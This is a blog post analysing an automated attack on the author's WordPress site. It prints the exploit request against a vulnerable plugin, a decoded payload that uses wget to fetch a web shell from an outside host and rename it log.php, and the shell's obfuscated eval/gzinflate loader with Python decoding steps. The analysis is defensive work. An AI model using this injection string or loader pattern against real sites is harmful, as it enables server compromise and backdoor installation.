Automated or manual attack?

2011, Dec 04    

Today I received a notification about an automated attack against this blog. Nothing new, however, I was curious about how it exactly works and decided to take a brief look to the attack to answer various questions:

  • What vulnerability is this exploiting? Am I vulnerable?
  • What does the payload?
  • Is this an automated attack or a manually launched one?

The attack in the logs

Since I installed mute screamer plugin for WordPress I receive regularly attack alerts (mainly about spamming). The one I received today was a bit different. In the generated log file the following line appears:

/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));

So, this is an exploit for a PHP code injection vulnerability in “engine.php”. A quick search of the vulnerability revealed this: WordPress is_human() Plugin Remote Command Injection Vulnerability. Fortunately, I don’t have this plugin installed so I already answered the first 2 questions. Time to answer the next one: what the payload does?

Analyzing the payload

In the generated log file we clearly see what code is the exploit trying to inject, in base64 format. Decoding it we get the following code:

  1. >>> import base64
  2. >>> base64.b64decode("cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7")
  3. "passthru('wget http://www.sck.obecvrbov.sk/wp-content/uploads/fgallery/sh.txt; mv sh.txt log.php');"

The function passthru executes an operating system command and returns to the browser the output of the command (anyway, it isn’t being used in this particular exploit). So, the attacker is downloading a backdoor and copying to log.php. The file the exploit downloads looks like this:

  1. <?php
  2. $auth_pass = "";
  3. $color = "#df5";
  4. $default_action = 'FilesMan';
  5. $default_use_ajax = true;
  6. $default_charset = 'Windows-1251';
  7. preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'[[BASE64 CODE]]'\x29\x29\x29\x3B",".");

OK, looking to this it’s clear that the function preg_replace is executing something but, what and how? My guess was that the “/e” modifier for the regular expression was for executing PHP code for a match and I was right. The code that is executed for every match (and it matches the complete buffer passed to preg_replace as the regex is “.*”) is the following:

  1. eval(gzinflate(base64_decode([[BASE64 CODE]])))

OK, the code is base64 encoded and also compressed with Gzip. Let’s decode and decompress it:

  1. >>> x = base64.b64decode("7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jT…AYT72vwA=")
  2. >>> import zlib
  3. >>> ungziped_str = zlib.decompressobj().decompress('x\x9c' + x)
  4. >>> print ungziped_str[:100]
  5. if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archi…
  6. <span class="st0"</span>

OK, finally we have the real code that will be executed! A copy of the unobfuscated and formatted source is here. This is a common web shell typically used in automated attacks.

Conclussion

I cannot be 100% sure if it was an automated or a manual attack but, my guess, is that this was simply a blind automated attack launched against many web sites and, among them, this blog.